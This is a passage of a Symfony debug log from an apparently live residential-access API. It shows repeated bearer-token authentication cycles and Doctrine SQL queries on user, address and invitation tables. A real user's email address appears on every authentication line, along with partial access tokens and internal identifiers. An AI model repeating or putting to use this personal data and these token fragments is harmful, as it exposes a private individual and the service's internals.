  9606. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [485] []
  9607. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9608. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [387] []
  9609. [2025-12-21 02:23:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.monday AS monday_6, t0.tuesday AS tuesday_7, t0.wednesday AS wednesday_8, t0.thursday AS thursday_9, t0.friday AS friday_10, t0.saturday AS saturday_11, t0.sunday AS sunday_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.invitation_id AS invitation_id_15 FROM `interval` t0 WHERE t0.invitation_id = ? [25549] []
  9610. [2025-12-21 02:23:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9611. [2025-12-21 02:23:29] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9612. [2025-12-21 02:23:29] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9613. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9614. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9615. [2025-12-21 02:23:29] security.DEBUG: Cannot refresh token because user has changed. {"username":"nachoslsu@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9616. [2025-12-21 02:23:29] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9617. [2025-12-21 02:23:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9618. [2025-12-21 02:23:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9619. [2025-12-21 02:23:29] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9620. [2025-12-21 02:23:29] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9621. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9622. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9623. [2025-12-21 02:23:29] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9624. [2025-12-21 02:23:29] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9625. [2025-12-21 02:23:29] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9626. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["3cca5f86-17af-4c0b-b794-bd [...]"] []
  9627. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [487,1] []
  9628. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [487,1] []
  9629. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9630. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
  9631. [2025-12-21 02:23:29] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [487,263] []
  9632. [2025-12-21 02:23:29] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9633. [2025-12-21 02:23:31] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ea8ebf85-64c0-4608-897f-51db3c3b7f50","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ea8ebf85-64c0-4608-897f-51db3c3b7f50/invitation/10/0?order=desc","method":"GET"} []
  9634. [2025-12-21 02:23:31] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9635. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9636. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9637. [2025-12-21 02:23:31] security.DEBUG: Cannot refresh token because user has changed. {"username":"nachoslsu@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9638. [2025-12-21 02:23:31] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9639. [2025-12-21 02:23:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9640. [2025-12-21 02:23:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9641. [2025-12-21 02:23:31] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9642. [2025-12-21 02:23:31] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9643. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9644. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9645. [2025-12-21 02:23:31] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9646. [2025-12-21 02:23:31] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9647. [2025-12-21 02:23:31] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9648. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
  9649. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [487,263,1] []
  9650. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
  9651. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  9652. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [263,1] []
  9653. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [263,1] []
  9654. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [485] []
  9655. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9656. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [387] []
  9657. [2025-12-21 02:23:31] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.monday AS monday_6, t0.tuesday AS tuesday_7, t0.wednesday AS wednesday_8, t0.thursday AS thursday_9, t0.friday AS friday_10, t0.saturday AS saturday_11, t0.sunday AS sunday_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.invitation_id AS invitation_id_15 FROM `interval` t0 WHERE t0.invitation_id = ? [25549] []
  9658. [2025-12-21 02:23:31] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9659. [2025-12-21 02:23:33] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"ea8ebf85-64c0-4608-897f-51db3c3b7f50","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/ea8ebf85-64c0-4608-897f-51db3c3b7f50/invitation/10/0?order=desc","method":"GET"} []
  9660. [2025-12-21 02:23:33] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9661. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9662. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9663. [2025-12-21 02:23:33] security.DEBUG: Cannot refresh token because user has changed. {"username":"nachoslsu@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9664. [2025-12-21 02:23:33] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9665. [2025-12-21 02:23:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9666. [2025-12-21 02:23:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9667. [2025-12-21 02:23:33] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9668. [2025-12-21 02:23:33] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9669. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9670. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9671. [2025-12-21 02:23:33] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9672. [2025-12-21 02:23:33] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9673. [2025-12-21 02:23:33] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9674. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
  9675. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [487,263,1] []
  9676. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["ea8ebf85-64c0-4608-897f-51 [...]"] []
  9677. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  9678. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [263,1] []
  9679. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [263,1] []
  9680. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [485] []
  9681. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9682. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [387] []
  9683. [2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.monday AS monday_6, t0.tuesday AS tuesday_7, t0.wednesday AS wednesday_8, t0.thursday AS thursday_9, t0.friday AS friday_10, t0.saturday AS saturday_11, t0.sunday AS sunday_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.invitation_id AS invitation_id_15 FROM `interval` t0 WHERE t0.invitation_id = ? [25549] []
  9684. [2025-12-21 02:23:33] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9685. [2025-12-21 02:23:38] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"ea8ebf85-64c0-4608-897f-51db3c3b7f50","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/ea8ebf85-64c0-4608-897f-51db3c3b7f50/providers","method":"GET"} []
  9686. [2025-12-21 02:23:38] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9687. [2025-12-21 02:23:38] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
  9688. [2025-12-21 02:23:38] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
  9689. [2025-12-21 02:23:38] security.DEBUG: Cannot refresh token because user has changed. {"username":"nachoslsu@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9690. [2025-12-21 02:23:38] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9691. [2025-12-21 02:23:38] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9692. [2025-12-21 02:23:38] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9693. [2025-12-21 02:23:38] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9694. [2025-12-21 02:23:38] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
